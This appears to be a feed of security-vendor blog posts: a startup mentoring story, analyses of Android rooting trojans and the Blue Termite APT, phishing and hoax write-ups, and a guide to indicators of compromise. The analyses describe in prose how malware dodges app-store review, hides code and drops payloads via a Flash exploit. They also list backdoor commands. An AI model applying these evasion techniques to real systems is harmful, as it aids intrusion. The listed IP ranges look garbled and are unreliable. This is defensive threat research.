Malware RSS Feed
How would you describe the best job in the world of security research? Would it be to work at the forefront of security research, diving into the bits and bytes of advanced malware and global threats, or to have a versatile job that can take you anywhere in the world.
Well – at Kaspersky Lab, and specifically in GReAT, you have both!
I’m a man of security and martial arts. I’ve had my share of both, and still have a lot to learn. While both are exciting and fulfilling, there is nothing greater than giving without expecting to get anything in return. Volunteering, in general, is something I personally put as one of the top priorities, but I have never had the chance to volunteer in a way that makes the world tick. One amazing opportunity to take a break from the day to day activities of hunting malware trends is exactly that.
I met Oleg Ishanov, former VP of our company, at the very beginning of what was called the Security Startup Challenge 2015. It was sunny in Jerusalem, the weather was fantastic and the Hebrew University became a host for security startups from all around Israel. We’ve seen amazing ideas and together we decided that I should join the team of mentors and set sail on a journey I never thought possible.
Participation badge at the SSC finals, MIT, Boston MA
On January 10th of this year, a mailbox started filling up with incoming requests to join one of the most exciting programs existing to-date in the world of security. The security giant Kaspersky Lab launched its lavish acceleration program and a team of mentors, including myself, took their seats on the front row, waiting for the most brilliant and innovative minds to take the stage and convince us that they deserve a spot in the Bootcamp. As the program continued, we found ourselves searching for startups who hadn’t even applied. Some of them came as an audience and stayed as competitors: and some of them even came only with a wild idea in their minds and made it all the way to the finals with their prototype all running! It was incredible.
From this moment on, a journey took place around the world. Kaspersky experts, mentors and other parties met the startups in their homelands and tried to understand whether they were acceleration program material or not.
As I mentioned earlier, first up was Israel. We met at the Hebrew University in Jerusalem. The weather was great and the hall was full of anxiety, excitement and the warm feeling of standing under the wings of the eagle in the sky of security – Kaspersky Lab. Jerusalem was just the beginning. After it the team visited Berlin, San Francisco, Moscow and, last but not least, Singapore.
From Jerusalem to Singapore – SSC first round
For almost 3 months, hundreds of startups took their shot at impressing the team and qualify for the program, but only 40 made it. And in May the list was closed and the 40 received an announcement that they were part of the bootcamp. As far as what some of them told me, it was an unforgettable moment. Although it took place after they had already met with some of the mentors, it was as if the journey had just started. Luxembourg was the next checkpoint; and while waiting for this bootcamp to begin, every 4-6 startups were assigned to one of the mentors, as a tracker. The tracker’s role was to track the decision makers and make sure they were making smart choices, and even to join the brainstorming to evaluate all other options beforehand.
Joining decision makers of a small startup and understanding their way of thinking is not an easy task. It is rather challenging to inspect the situation and analyze the decisions in real-time, assuring them that you have alternatives to offer.
As a tracker, I felt that the startups assigned to me had unique characteristics. Not one of them had an equivalent market. Medical security, social privacy, security through gamification and cyber assurance are all very divergent markets. They were still in the early stages, which meant that every day for them mattered, every decision was inspected to its root cause and future results, and every line of code was thought over in advance, to make sure we were prioritizing properly.
Startups were mostly caught up between marketing, branding, improving their technology and getting the interest of VCs and new leads, but I also found some who really struggled to understand if they are actually what they claim to be or should they pivot. Pivoting in general is not a bad thing, however it should be done with care and after the founders considered all other options before making any radical decisions.
Other startups had problems leaving their jobs and start full time; this is, without a doubt, one of the first things VCs are looking for – commitment. Another case that surprise me must was startups who rely on early acquisition and some of them are even confident in their decision to make their solution completely free.
The world of the startups is fascinating and full of surprises. One day is never similar to the next. You keep shifting and adjusting, tossing sketches and starting from scratch. As a tracker, you’re witnessing all that.
To The Bootcamp, And Beyond.
Every startup had to follow the program’s demands and present its progress every week in a Skype/Face2Face meeting with the mentors, called a board meeting (BM).
These meetings were a tool for the mentors to test the founders in real-time, ask questions and listen to a 20-minute speech which was followed by a strict presentation of nothing but facts. This analysis was enough for the mentors to grade each startup from a level of 1-10, and add relevant feedback for later assignments. Those who received the highest scores qualified to the next week of the bootcamp, and finally to the finals.
Bootcamp summary from PwC offices in Luxembourg
The bootcamp turned 40 startups into 11 finalists and after several weeks the announcement was made public. The startups who made it to the finals in Boston had to make sure they had everything prepared as they were about to attend a week of intense competition that included, among the rest our judges, doctors and professors of the institute where the finals took place – the Massachusetts Institute of Technology, also known as MIT.
The finals took four days in total and the startups were crunched in a little room in E50 building’s 4th floor. The old brick building may seem quiet on the outside, but one specific room was full of innovative, forward-looking and mostly brilliant minds, which I personally admire.
4th floor, E50 building, MIT – Finalists listen to Sharon’s (SecInMotion) pitch
Three days went by fast as the startups were working non-stop. They practiced their pitch with Angelika Blendstrup and Gigi Wang, were tutored by Professor Stuart Madnik on how startups should approach CISO/CSO and finally had a session with me and my tennis balls, including a nice story on how I started juggling.
A Session With Me And My Tennis Balls
The third day was an absolute thrill. I had the opportunity of having a comic session with all the participants. The word ‘tennis’ is (and was in the session) in light grey, since the idea was to break the ice before the big finale. We sat in a semicircle and three tennis balls were virtual links I used in order to allocate questions to the founders who answered them. A program was running in the background of my laptop, displaying the acceleration program-related questions on a projector screen, and a one minute timer counting the allocated time to answer each one. Each time 10 seconds were left on the timer, I tossed the ball to a person in the circle to get ready for the next question. After breaking the ice, we all sat together and talked about every subject that rose to the surface.
My next talk was on the day after; a speech that was combined with moderating the final keynote pitches of each startup, right before the big announcement about the winners. At 10AM of the final day, Christel had opened the day with moderating the 5-minute pitch which included questions from the audience. First row were our judges from MIT – Prof. John R. Williams, Associate Prof. Nickolai Zeldovich, Mr. Michael Coden, Prof. Stuart Madnick and Dr. Abel Sanchez.
Since it’s the last day we had to first pick the winners – without question a tough decision to make!
It was a complete honor to sit side by side with them and share thoughts on the final winners. It was also tough to convince them which one deserved the better chance.
We picked the top five and started moving from there towards the top 3.
It came to a point where each one of the judges and mentors had his favorite startup and was not about to give up on it. Judges from MIT decided to make a surprising move and announced two startups as “Honorable Mention”, which is a much respected rank from MIT and will gain the startups who won it (Whispeer and CTF365) the media coverage they need and the opportunity to accomplish a big step forward in penetrating their market.
As the sun set on the final day, the view from the 6th floor of the media lab building was stunning. The Charles River that splits Cambridge from Boston is a view from the building’s wooden balcony that you can’t ignore.
Next up was Natalya Obelets, Deputy Head Of Education Initiatives and Christopher Doggett, Managing Director of Kaspersky Lab North America. Keynotes were done and it was my time to take my place.
The view from the balcony in MIT Media Lab
Warm up story and we’re off
In almost every speech I give I try to bring a personal story to wrap the main idea of what I’m about to deliver to the audience. This time I thought about creating a presentation, but an incident with my older daughter in the hotel pool changed my mind and I decided to go freestyle.
At first I had to speak about what had happened. My daughter, who waited for me in the hotel room with her sister and mother every day, was excited to see me coming back to lunch break on the last day. She reminded me that I had promised to take her to the pool. I changed in to my swimsuit quickly, as all the startup founders and mentors were still busy with the finals, and rushed to the pool. She was so excited that she almost drowned in one of her jumps in to the water, while I was floating around deep in thought about my speech. That was the moment when I knew I needed to speak about mistakes.
Security Startup Challenge day of announcements
The people in the front row of the room had hundreds of years of experience, while professors from MIT were gazing at the big screen TV that had nothing but the SSC logo on it. I started talking about mistakes. Why are they so important? Isn’t it obvious? Well, for some of us, expectations are so big that we forget to remember the experience we gain in the privilege of making mistakes. Everyone makes them; it’s inevitable and is the most basic factor that differentiates us from a machine. I was mostly sharing experience from the program, rather than speaking about generic mistakes. One startup, for example, wanted to penetrate its market in Singapore. They struggled their way through middle-men who were after their money rather than their success. “Surprise, surprise”, I told them – we have here startups from Singapore, why not just sit together and bridge this gap without the middle-men?
They acted like a train with no stops – one source, one destination. But the answer lay under their noses. Others made mistakes in how they presented their startup to the board, and some made mistakes around prioritizing tasks.
Speaking at the finals – freestyle about mistakes and how to embrace them
In a three- minute freestyle pitch, each startup had to present, for the last time, its agenda, before major people that had come to the event specifically to meet their next investment. MIT also hosted TV crews and interviewed each founder for local and external publications.
We’ve seen a lot during the program and learned as we went. The most important idea was to keep it simple. Open your mind and make sure you have all the options laid on the table. Research, consult, decide, act, analyze results and prioritize interactions – and never forget to smile while doing each of the above! We are here for the journey as well, not only for the goal.
With that in mind, I passed the mic to my colleagues and we continued with some word of advice to consider as a startup and when joining such a program. We got amazing feedback from startups, ground teams and judges from MIT. I would like to acknowledge my team of mentors for having me on board this journey and giving me the opportunity of influencing the world of security in such way that is most crucial today – innovation.
Team Of Mentors & Education: Oleg Ishanov, Eugene Barulin, Nickolai Mityushin, Ilya Antipov, Ilya Kuznetsov, Alena Gilevskaya, Veniamin Ginodman, Natalya Obelets and Christel Gampig-Avila.
Security Startup Challenge 2015 Winners: Excalibur, Pipe, ZeroDB & DriveWare
I hope to see each one of the startups become a successful business, a market game changer and a role model to learn from. It was a pure privilege working with them.
I also wish all the best to the winners. And we hope to see new innovations and brilliant minds in the next program.
Since June 2015, we have seen a steady growth in the number of mobile malware attacks that use superuser privileges (root access) on the device to achieve their goals.
Root access is incompatible with the operating system’s security model because it violates the principle that applications should be isolated from each other and from the system. It gives an application using root access a virtually unlimited control of the device, which is completely unacceptable in the case of a malicious application.
Malicious use of superuser privileges is not new in itself: in regions where smartphones are sold with privilege escalation tools preinstalled on them, malware writers have long been using this technique. There are also known cases of Trojans gaining such privileges after the user ‘rooted’ the device, i.e. used vulnerabilities to install applications that give superuser privileges on the phone.
However, the malware described in this post gains root privileges on its own, with the device owner having no idea that there is an application with superuser rights on the phone.How it works
We analyzed the statistics we had collected from May to August 2015 and identified three main Trojan families that use root privileges without the user’s knowledge: Trojan.AndroidOS.Ztorg, Trojan-Dropper.AndroidOS.Gorpo (which operates in conjunction with Trojan.AndroidOS.Fadeb) and Trojan-Downloader.AndroidOS.Leech. All these mobile malware families can install programs; their functionality is in effect limited to providing the capability to download and install any applications on the phone without the user’s knowledge.
A distinctive feature of these mobile Trojans is that they are packages built into legitimate applications but not in any way connected with these applications’ original purpose. Cybercriminals simply take popular legit apps and add malicious code without affecting the main functionality.
After launching, the Trojan attempts to exploit Android OS vulnerabilities known to it one after another in order to gain superuser privileges. In case of success, a standalone version of the malware is installed in the system application folder (/system/app). It regularly connects to the cybercriminals’ server, waiting for commands to download and install other applications. Since subsequent behavior of the malware varies by family, we discuss each of the families separately below.Fadeb and Gorpo families
It should first be explained why we say that these two families work in conjunction with each other. An analysis of their code has shown that both malicious programs are based on the same framework, with identical methods for hiding strings used in their code. Functionally, Trojan.AndroidOS.Fadeb is responsible for downloading and installing files, while Trojan-Dropper.AndroidOS.Gorpo obtains escalated privileges on the device and then installs Fadeb in /system/app under the name LauncherXXXX.apk. Older versions of Trojan.AndroidOS.Fadeb worked on a ‘standalone’ basis and depended on the su file, installed either by the manufacturer or by the user, being present on the device.
Trojans from these two families are found on inexpensive smartphones – as packages built into popular applications, such as Twitter, Facebook, various launchers, etc. An analysis of infected devices’ firmware has shown that applications that include malicious code are not supplied by the phone manufacturer. The users themselves did not install these applications in standard ways, either. We believe that these applications may have been installed by third parties before the devices reached the users. These could be small private shops that try to install as many applications on devices as possible to make customers happy but use unsafe software sources without performing any security scans of the files they download.
We came up with this theory after studying various websites and user forums where users described cases of devices being infected without their knowledge and Trojans being found on newly-purchased devices.
The list of infection sources does not end there: sometimes users themselves downloaded these Trojans from unofficial app stores. According to our statistics, the most popular infected applications were:
This malware family is the most advanced of those described in this post: some of its versions can bypass dynamic checks performed by Google before applications can appear in the official Google Play Store. Malware from this family can obtain (based on device IP address, using a resource called ipinfo.io) a range of data, including country of registration, address, and domain names matching the IP address. Next, the Trojan checks whether the IP address is in the IP ranges used by Google:
- 126.96.36.199 – 188.8.131.52
- 184.108.40.206 – 220.127.116.11
- 18.104.22.168 – 22.214.171.124
- 126.96.36.199 – 188.8.131.52
- 184.108.40.206 – 220.127.116.11
If the IP address is in one of the above ranges, the malware terminates.
The domain names matching the device’s IP address were also checked for the presence of the following strings: “android”, “google” and “1e100″ (a service used by Google internally; its name is the mathematical formula for the number googol). In this way, the Trojan checks whether the infected device is on Google’s corporate network. This is necessary in order to pass the dynamic tests required before an application can be made available in Google Play app store. When Leech detects that it is on the Google network, this means that it is undergoing a check of this kind, so it terminates.
The malware also uses a dynamic code loading technique, which involves downloading all critically important modules and loading them into its context at run time. This makes static analysis of the application difficult. As a result of using all the techniques described above, the Trojan made it to the official Google Play app store as part of an application named “How Old Camera” – a service that attempts to guess people’s ages from their photos.
As we can see, the app appeared on May 22, 2015, at the peak of popularity enjoyed by a similar Microsoft service. At the time it was removed from Google Play (June 10, 2015), its number of registered installations was in the range from 100,000 to 500,000, which is a lot, particularly in view of the danger posed by the app. A package with the Trojan was also embedded in other popular legitimate applications, such as apps for downloading videos from YouTube or for installing live wallpapers.
After successfully gaining superuser privileges, Leech installs another application to /system/app folder, in addition to its own standalone version. It is an app named “com.sync.sms”, which is detected by Kaspersky Lab products as Trojan.AndroidOS.Guerilla.a. This Trojan carries out aggressive advertising campaigns for other applications. The campaigns include displaying advertising in the status bar, in third-party applications, as well as downloading and installing applications (including the ability to download apps from Google Play) and displaying any interactive elements on the device’s screen.
Interactive elements displayed by Trojan.AndroidOS.Guerilla.a
The Guerilla Trojan can also inject its code into system applications in device memory in order to ensure that it will keep getting launched.
Below is a list of applications advertised by the Guerilla Trojan:
Leech provides access to infected devices not only to Guerilla but to much more dangerous malware, as well. This is why we have decided to write a separate article about this malicious program, in which we are going to describe both this remarkable Trojan and its derivatives.Ztorg family
On the whole, Trojans belonging to this family have the same functionality as the families described above. The distribution techniques used also match those employed to spread Trojans from the Gorpo (plus Fadeb) and Leech families – malicious code packages are embedded in legitimate applications. The only significant difference is that the latest versions of this malware use a protection technique that enables them to completely hide code from static analysis. The attackers use a protector that replaces the application’s executable file with a dummy, decrypting the original executable file and loading it into the process’s address space when the application is launched. Additionally, string obfuscation is used to make the task of analyzing these files, which is quite complicated as it is, even more difficult.
Ztorg versions that do not use this kind of protection are detected by Kaspersky Lab products as Trojan.AndroidOS.Ztorg.a and versions with protection are detected as Trojan.AndroidOS.Ztorg.b.Statistics
Data on the activity of the families described above is provided below. Diagrams on the left-hand side are graphs showing the number of newly attacked users over time and the right-hand images are geographical distribution maps.
The largest number of infection attempts for the Leech Trojan was recorded in the first half of July, with about 33 thousand users attacked over the two-week period. Attacks peaked on July 9 – over 2,800 potential victims.
Trojan.AndroidOS.Ztorg.a was quite active in July – an average of more than 1200 users attacked per day. Around the middle of July, its popularity sharply declined, as the malware was replaced with its new modification –Trojan.AndroidOS.Ztorg.b. The Trojan’s protected version was more active and attacked about 1300 users daily in July.
The activity of Trojan-Dropper.AndroidOS.Gorpo.a rose gradually, starting in early May 2015. However, we recorded two surges – on June 30 and July 16. On these days, the number of users attacked exceeded 1500 and 1800, respectively.
Trojan.AndroidOS.Fadeb.a could be regarded as the least successful of the malicious programs described above. Its activity also increased starting in early May, but even in the first half of July, which was its most active period, the number of users attacked did not exceed 1,000 per day.
The majority of users attacked by the Trojans were located in Russia and India, as well as countries of the Middle East. However, tens and even hundreds of infections were recorded in other regions, too.Conclusion
It is not very common for malicious applications to be able to gain superuser privileges on their own. Such techniques have mainly been used in sophisticated malware designed for targeted attacks. The cases described in this post show that these techniques are becoming more mainstream: run-of-the mill malware increasingly uses similar (if not more advanced) techniques. This creates a dangerous trend. Although the Trojans described above are mostly used for advertising purposes, nothing would prevent them from using their newly-gained superuser privileges to install applications that can do users much more harm than just irritation caused by annoying advertising.
Today I ran into a typical fraud email claiming to come from a U.S. bank but with a twist! Analyzing the attachment, it turns out that there’s no malware inside but instead a new middle step to fool lesser security software.
The original file name is “Swift confirmation .pdf” and it was created using Microsoft Word 2010./Author(Unknown)/CreationDate(D:20150814180000-04’00’)/Creator(Microsoft« Word 2010
So, if it is not malware then what’s the catch?
Well, this is a ‘Mediabox’-clickable document file used to redirect victims to a phishing website.
If the victim clicks on ‘View pdf File’ then it first opens a redirector website and then finally makes the jump to a server located in Chile that actually hosts the phishing attempt.
This is an interesting technique that would fool some Anti-Phishing filters based on analysis of the URLs in the embedded email messages themselves.
In October 2014, Kaspersky Lab started to research “Blue Termite”, an Advanced Persistent Threat (APT) targeting Japan. The oldest sample we’ve seen up to now is from November 2013.
This is not the first time the country has been a victim of an APT. However, the attack is different in two respects: unlike other APTs, the main focus of Blue Termite is to attack Japanese organizations; and most of their C2s are located in Japan. One of the top targets is the Japan Pension Service, but the list of targeted industries includes government and government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and so on. Unfortunately, the attack is still active and the number of victims has been increasing.
The following graph shows daily access to some of the known C2s:
You will see a significant increase in the middle of July (marked in orange). The spike resulted from new attack methods that the Blue Termite group employed and that Kaspersky Lab detects. This article introduces the new methods and technical details on how they work.New method of initial infection
Originally, the main infection vector of the APT was spear-phishing emails. Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit (CVE-2015-5119, the one leaked from The Hacking Team incident).
Several Japanese web sites have been compromised with this method.
The malicious code inserted into the compromised site points to “faq.html”.
The source code of “faq.html”:
The “faq.html” loads “movie.swf” which contains the exploit. In this way, the malware infects a visitor’s machine when it’s accessed.
The “movie.swf” header is “ZWS”, a flash file compressed using the Lempel-Ziv-Markov chain-Algorithm (LZMA):
The file contains a big data section, marked in blue:
The data includes 12 bytes of header. The encoded data begins at 0x5dca (“\x78\x9c\xec\xb7….”) and is compressed using zlib. After decompression, an executable file (with an “MZ header”) is found.
In addition to the above data, the swf file also has a shellcode in ActionScript (AS):
The function of this shellcode is quite simple: it saves the extracted executable file as “rdws.exe” in the current temp directory, then executes it with WinExec().
The extracted executable file is “emdivi t17″, a new infection vector used by the attackers. We found several kinds of malware that execute as rdws.exe, and emdivi t17 is one of them.
Kaspersky Lab also found some watering hole attacks, including one on a website belonging to a prominent member of the Japanese government. We sent a notification email to the admin and ISP of the affected site but didn’t receive any reply. However, the malicious code was removed after about an hour. The code below filters out any IPs except for the one belonging to the specific Japanese governmental organization.
Interestingly, the script includes IP information with the variable name “TEST”. We suspect this is the attackers’ testing IP, located in Shanghai.Customized malware according to target
Kaspersky Lab detected the tailored malware, “emdivi t20″. This malware is basically used after the infection by emdivi t17 that serves as a backdoor. Although the versions emdivi t17 and emdivi t20 are from the same emdivi family, the latter is more sophisticated.. For example, let’s look at the backdoor commands they make use of. emdivi t17 has 9 commands; on the other hand, some of emdivi t20 samples have up to 40 commands.
Commands supported by emdivi t17:command md5 DOABORT d895d96bc3ae51944b29d53d599a2341 DOWNBG 39cd12d51b236befc5f939a552181d73 GETFILE 74a9d3a81b79eec0aa2f849cbc8a7efb GOTO 4b8bb3c94a9676b5f34ace4d7102e5b9 LOADDLL 67ca07ecb95c4055d2687815d0c0f8b9 SETCMD 48bb700b80557ee2e5cf06c90ba6698c SUSPEND ee93a0b023cef18b34ebfee347881c14 UPLOAD 8dff5f89b87ebf91a1ecc1dbed3a6fbb VERSION 021321e8c168ba3ae39ce3a2e7b3ec87
Commands supported by emdivi t20:command md5 abort 5bb94a1c12413a2e5d14deabab29f2aa cd 6865aeb3a9ed28f9a79ec454b259e5d0 copy 12cba3ee81cf4a793796a51b6327c678 dir 736007832d2167baaae763fd3a3f3cf1 diskls e120a254f254978fc265354a4e79d1d6 doabort 1f6dcc1149b2eef63f6dd4833d5ef0d3 downbg 1e04875a872812e1f431283244b180d2 downbg2 7f3e982a0d9b4aa5303332aaf414d457 download fd456406745d816a45cae554c788e754 download2 b5a4000c99977ce512052d4e8bf737f8 execute ec0cd3cb91fe82b9501f62a528eb07a9 exhide fc236c4ddd3414cee8bd3cbd937461c0 exit f24f62eeb789199b9b2e467df3b1876b exuser 0b5396d6bd0867485ff63067ad9363e7 get b5eda0a74558a342cf659187f06f746f getfile b24ba6d783f2aa471b9472109a5ec0ee getlnk 71574cf393bf901effa0cbc6c37e4ce2 goto de94e676c0358eefea4794f03d6bda4f hash 0800fc577294c34e0b28ad2839435945 head 96e89a298e0a9f469b9ae458d6afae9f hjlnk ebb0149209e008e3f87e26659aa9b173 loaddll 0340b5e3f0d0ea71eeef6ab890270fc0 md 793914c9c583d9d86d0f4ed8c521b0c1 mklnk a3bb50704b87da1858a46455dfb5e470 move 3734a903022249b3010be1897042568e post 42b90196b487c54069097a68fe98ab6f postfile 316713cb9f82ff9ade53712ab1cbf92c postfile2 f15ae485061a10adead43d7f5d5a9889 rd eeec033a2c4d56d7ba16b69358779091 runas d88f585460839dd14ad3354bb0d5353b screen 599eba19aa93a929cb8589f148b8a6c4 setcmd 27dc2525548f8ab10a2532037a9657e0 setlen 846a44d63b02c23bcfee5b4ccaa89d54 suspend 497927fb538c4a1572d3b3a98313cab1 tasklist 6e0ad8e44cff1b5d2901e1c7d166a2a4 type 599dcce2998a6b40b1e38e8c6006cb0a unzip 0a342b59ecdcede0571340b9ed11633f upload 76ee3de97a1b8b903319b7c013d8c877 version 2af72f100c356273d46284f6fd1dfc08 zip adcdbd79a8d84175c229b192aadc02f2
They both store the md5 checksums of backdoor commands.
When analyzing emdivi t20 samples, we found that it is highly targeted in two respects.
Firstly, an emdivi t20 sample contains hardcoded internal proxy information, being encrypted at 0x44e79c:
The decrypted code is “proxy.??????????.co.jp:8080″:
This trick is not new, but it is not widely used. This is because it may reveal its targets, or it is not a generic method and only works in a specific organization. However, similar cases have been observed sometimes in other APTs.
The second aspect is quite interesting. The emdivi family stores important data about itself, including C2, API name, strings for anti-analysis, value of mutexes, as well as the md5 checksum of backdoor commands and the internal proxy information. They are stored in encrypted form, and are decrypted when necessary. Therefore, to analyze an emdivi sample in detail, we need to locate which hex codes are encrypted, and how to decrypt them. In the process of decryption, a unique decryption key is required for each sample.
emdivi t20 has a function to generate a decryption key using Salt1 and Salt2. Salt1 is generated from a magic string (suspected to be a version of emdivi) with certain four digits (suspected to be an ID of the C2).
Example of a magic string:
Part of the emdivi name (“t17″ and “t20″) is taken from this hardcoded magic string.
Salt2 is generated with a large amount of data that is hardcoded:
In most cases, the emdivi family generates a decryption key using Salt1 and Salt2.
In early July 2015, however, Kaspersky Lab found a sample that creates a decryption key with Salt1, Salt2, and Salt3. Salt3 is the security identifier (SID) from a compromised PC.
The flow of decryption key generation (with additional Salt3):
In other words, the sample works only on its target PCs. Without knowing the victim’s SID, the decryption key will not be generated successfully, making it difficult to decrypt important data. This means it’s not possible to analyze the malware in detail.
Fortunately, we were able to analyze those samples. We were able to successfully brute-force the decryption keys from several samples without SIDs.Summary
From early June, when the cyber-attack on the Japan Pension Service started to be reported widely, various Japanese organizations would have started to deploy protection measures. However, the attackers from Blue Termite, who it seems kept a close eye on them, started to employ new attack methods and successfully expanded their operation. While writing this article, another sample of emdivi t20 has been found. It employs AES in addition to SID tricks, making it difficult to decrypt sensitive data. In order to fight back against this cyber-espionage, Kaspersky Lab will continue its research.
Kaspersky products detect emdivi t17, emdivi t20, and the flash exploits using the verdicts below:
More information about the Blue Termite targeted attacks is available to Kaspersky Security Intelligence Services customers. Contact: firstname.lastname@example.org
Today, I received this message from a friend living in Mexico via Whatsapp.
According to the message, Starbucks is giving away 500 in local currency credits if you take their survey, so my friend asked me to take a quick look to determine if it’s real.
Sadly for the coffee lovers among us, this is a classic hoax campaign abusing the Starbucks brand. If the victim follows the link from a mobile device, it loads a fake Starbucks survey with some scripts designed to customize the campaign according to the city of origin and its local currency.
So if you live in the U.S. you’re promised $500 USD but if you’re in Argentina then it’s only 500 pesos and so on. Argentinians are clearly getting the worse end of that deal.
If you have the patience to click through the survey, the scammers have the gall to ask you to spread the message to 10 of your contacts in order to redeem your imaginary voucher. This is how this Hoax is spread –by enlisting the help of gullible victims to prey on their friends!
What if the victim uses a desktop browser? There is a script on the aforementioned site, which is actually located in Moldova, that detects the browser’s user agent. If it matches with a desktop version, the script redirects the visitor to the following URL:
That URL in turn redirects visitors to another website for a Fake (Rogue) Technical Support service meant to scare the victim into providing remote access to their system.
It turns out that Google Hangouts calls to that number are prohibited. My first calling attempt met an automated answer of ‘This number is not in service’. However, on a second attempt with an alternate line I was able to connect to somebody with a foreign accent.
If you’re so inclined, you can listen to just how nice and attentive the ‘support staff’ is. Note the pauses and emotional inflection behind each scripted scene like ‘My name is…’ and when I revealed that my computer is infected: https://clyp.it/v2gjp3jq
As you can see, this is an all around ‘Hoax-Fraud-Rogue’ scheme with redundancies and low chance of failure. Victims themselves are enlisted to rekindle the campaigns flames by spreading the message to 10 new users. So, first things first, it’s very important to break the cycle, stop bombarding your friends with scams! Next, invite them to have a conversation about how hoaxes work, maybe over a cup of coffee you’ll actually have to pay for.
Infrastructure owners must regularly check their resources for the presence of malicious components. One of the ways in which a resource may become infected is as a result of “zero-day” vulnerability exploitation by cybercriminals. In this case, the developers of security tools used to protect the information system may be as yet unaware of the new threat. At the same time, experts may be investigating incidents related to the new threat. Moreover, some findings of these investigations may already be publicly available.
Such reports have practical value. A typical report on an APT campaign includes the following information:
- Attack victims and the objectives of cybercriminals;
- List of victim nodes (IP addresses);
- Current activity of malicious components and/or cybercriminal groups;
- Detailed descriptions of tools and malicious components used by the cybercriminals;
- Description of the command-and-control (C&C) server infrastructure;
- Indicators of compromise.
Of all the detailed technical information on any given APT, “indicators of compromise” have the greatest practical value for security administrators. This is a set of data that can help an administrator of the corporate IT infrastructure to discover any malicious activity in the system and take appropriate action.
How should information system administrators use this data in practice? This paper is intended to provide an answer to this question.
An indicator of compromise is information on the signs of malicious activity, which is structured in such a way that it can be fed into automated tools designed to check the infrastructure for signs of infection. Although there is no generally accepted format for descriptions of these indicators, several types of structured data are widely used and supported in the industry.IOC
IOC (indicator of compromise) – a list of threat data (e.g., strings defining file paths or registry keys) which can be used to detect a threat in the infrastructure using automated software-based analysis.
Simple IOC usage scenarios involve searching the system for specific files using a variety of search criteria: MD5 hashes, file names, creation dates, sizes and other attributes. Additionally, memory can be searched for various signs specific to the threat and the Windows registry can be searched for specific records.
This data can be presented in a variety of formats, one example of which is OpenIOC. The different formats enable the data to be imported into different security solutions to provide further processing of the indicators. An administrator can integrate IOCs taken from reports into such security solutions as:
- Solutions of the Endpoint Security class
- Various incident investigation tools
There are many commercial solutions for working with IOC, but in many cases the capabilities of similar open-source programs are sufficient to check the target system for signs of infection. One example is Loki – an IOC scanner distributed under the GPL license, which can be used to search the target system for various indicators appearing as a result of malicious activity.
To scan the system using the Loki scanner, it is sufficient to unpack the archive containing the utility and add the relevant IOC attributes to the scanner’s knowledge base. The following IOC categories are located in the application’s folder named “signature”:
- “filename-iocs” – a text file containing lists of file system attributes produced by the activity of various threats;
- “hash-iocs” – a list of MD5, SHA1 and SHA256 hashes of malicious components that appear in the system after it is infected;
- “falsepositive-hashes” – a list of exceptions: MD5, SHA1 and SHA256 hashes that are marked as false positives by the scanner when detecting the relevant components.
As an example, consider the report we released after an investigation of the Carbanak APT. Page 36 of the report lists the MD5 hashes of all malware components that may be present in the system as a result of this infection. We can open the scanner’s file named “hash-iocs” and enter a rule for this threat in the following format: <MD5>;<description> .
List of Carbanak APT components’ MD5 hashes in Loki scanner’s “hash-iocs” file
The next step is to create an indicator in the text file named “filename-iocs”, which describes malicious components’ attributes in the file system. The indicator should have the following format:
IOC for the file system in Loki “filename-iocs” list
After entering the relevant indicators in the scanner’s knowledge base, we can launch a scan of the workstation. This requires launching the “loki.exe” executable file with administrator privileges (otherwise the scanner won’t be able to scan the contents of RAM for attributes) and wait for the scan to complete.
The process of scanning using Loki utility
Upon completing the scan, the application will generate a report and save it in the program’s folder under the name “loki.txt”.YARA rules
In addition to the various IOC indicators, there are files with the “.yar” extension attached to some reports. These files contain rules for YARA – a tool for identifying and categorizing malicious samples. The so-called YARA rules use a special syntax to describe attributes that indicate the presence of malicious activity in the system. If one of the rules is met, the analyzer returns an infection verdict that includes the relevant details (e.g., the threat’s name).
Loki scanner described above also supports YARA rules, which means that administrators can use .yar files taken from reports to scan the system for the threats described in these reports. This is done by copying a .yar file to the “signature” folder and launching a scan.
However, the official tool created by developers of the YARA project is much better suited to working with YARA rules, because its knowledge base is regularly updated and is much more extensive than the databases of other similar utilities. As a result, scanning provides a more comprehensive view of an information system’s security, with more complete information on the presence of malicious components in the system.
To scan a workstation, it is sufficient to launch the YARA utility with the necessary parameters. For example:
yara32.exe –d md5= <MD5_hash><this_is_yara_rule.yar><dir_for_check>
where “-d” is a parameter used to define external variables. If any matches to any of the rules are detected, the utility will display a notification including the rule name and the component triggering the rule.
Sample notification of a YARA rule match
The administrator can, for example, launch such scans at system startup. This can be done by writing a simple PowerShell script that will launch utilities with the right parameters and, if necessary, schedule it to run on all hosts at logon using the Active Directory: User configuration -> Windows configuration -> Scenarios ->Logon.STIX and JSON
Structured Threat Information Expression (STIX) is a unified language for recording threat information and importing it into software solutions. Many security solutions can import information in the STIX format (as well as JSON, which is described below) for using that information in the following kinds of infrastructure:
- Indicator-based security solutions (such as scanners)
- Forensic platforms
- Solutions of the Endpoint Security class, etc.
A STIX report can be imported into IBM QRadar, a popular SIEM solution, using a specially designed python script:
./stix_import.py -f STIXDocument.xml -i 192.168.56.2 -t XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX -r MyReferenceSet
where the “-f” parameter defines the location of a local STIX document, “-i” defines a host with a QRadar console installed on it, and “-t” defines a service token for QRadar.
STIX reports are also supported by the Splunk App for Enterprise Security intelligence platform and can be imported. A STIX file must have a .xml extension to be read and parsed.
It is worth noting that there is a Python utility called openioc-to-stix which can be used to convert OpenIOC format to STIX Indicators, enabling indicators of compromise to be imported as STIX rules into solutions that do not support OpenIOC.
JSON is one of the most popular data presentation formats, which is also often used to format data provided with reports. The use of JSON data depends on the administrator’s needs and on the software solution into which the data is imported. For example, if a JSON file contains IP addresses of command servers to which infected workstations connect, the administrator of the infrastructure protected by the solution can include these IPs in the blacklist of a firewall supporting JSON imports. If the firewall does not support importing data in this format, the administrator can use a parser (a JSON file analyzer) to export the IP list from the file and then import it into the firewall’s blacklist.Conclusion
“Indicators of compromise” help to use threat data effectively: identify malware and quickly respond to incidents. These indicators are very often included in threat reports, which are often skimmed by readers. Even if a document providing details of a research project does not have a dedicated Indicators of Compromise section, a reader can always extract useful data (information on the attributes found in infected systems) from the text, present the data extracted in any of the formats described above and import it into a security solution.
Our latest researches with indicators of compromise:
